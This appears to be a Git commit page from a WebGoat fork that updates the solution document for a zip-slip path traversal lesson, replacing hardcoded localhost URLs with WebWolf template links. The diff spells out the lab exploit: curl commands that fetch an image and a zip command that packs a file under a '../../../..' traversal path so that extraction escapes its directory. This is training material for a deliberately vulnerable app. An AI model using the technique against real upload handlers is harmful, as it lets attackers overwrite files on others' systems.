dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update the solution with WebWolf URLs

Browse Source 
The new solution uses WebWolf paths as these will change automatically when a user start WebGoat on a different port. It no longer depends on the hardcoded port `8080`.
This commit is contained in:
Nanne Baars 2023-01-05 07:49:15 +01:00 committed by Nanne Baars
parent fcaa2d8589
commit 54e115aff0
1 changed files with 4 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc
View File

@ -2,10 +2,10 @@
First, let's create a zip file with an image inside:
[source]
[source, subs="macros"]
----
curl -o cat.jpg http://localhost:8080/WebGoat/images/cats/1.jpg
zip profile.zip cat.jpg
curl -o webwolf.jpg webWolfRootLink:images/wolf.png[noLink, target=images/wolf.png]
zip profile.zip webwolf.jpg
----
Now let's upload this as our profile image. We can see nothing happens as mentioned in the assignment there is a bug in the software, and the result we see on the screen is:
@ -23,7 +23,7 @@ First, create the directory structure:
----
mkdir -p webGoatTempDir:temppath[]PathTraversal/username:user[]
cd webGoatTempDir:temppath[]PathTraversal/username:user[]
curl -o username:user[] http://localhost:8080/WebGoat/images/cats/1.jpg
curl -o username:user[].jpg webWolfRootLink:images/wolf.png[noLink, target=images/wolf.png]
zip profile.zip ../../../../../../../..webGoatTempDir:temppath[]PathTraversal/username:user[]/username:user[].jpg
----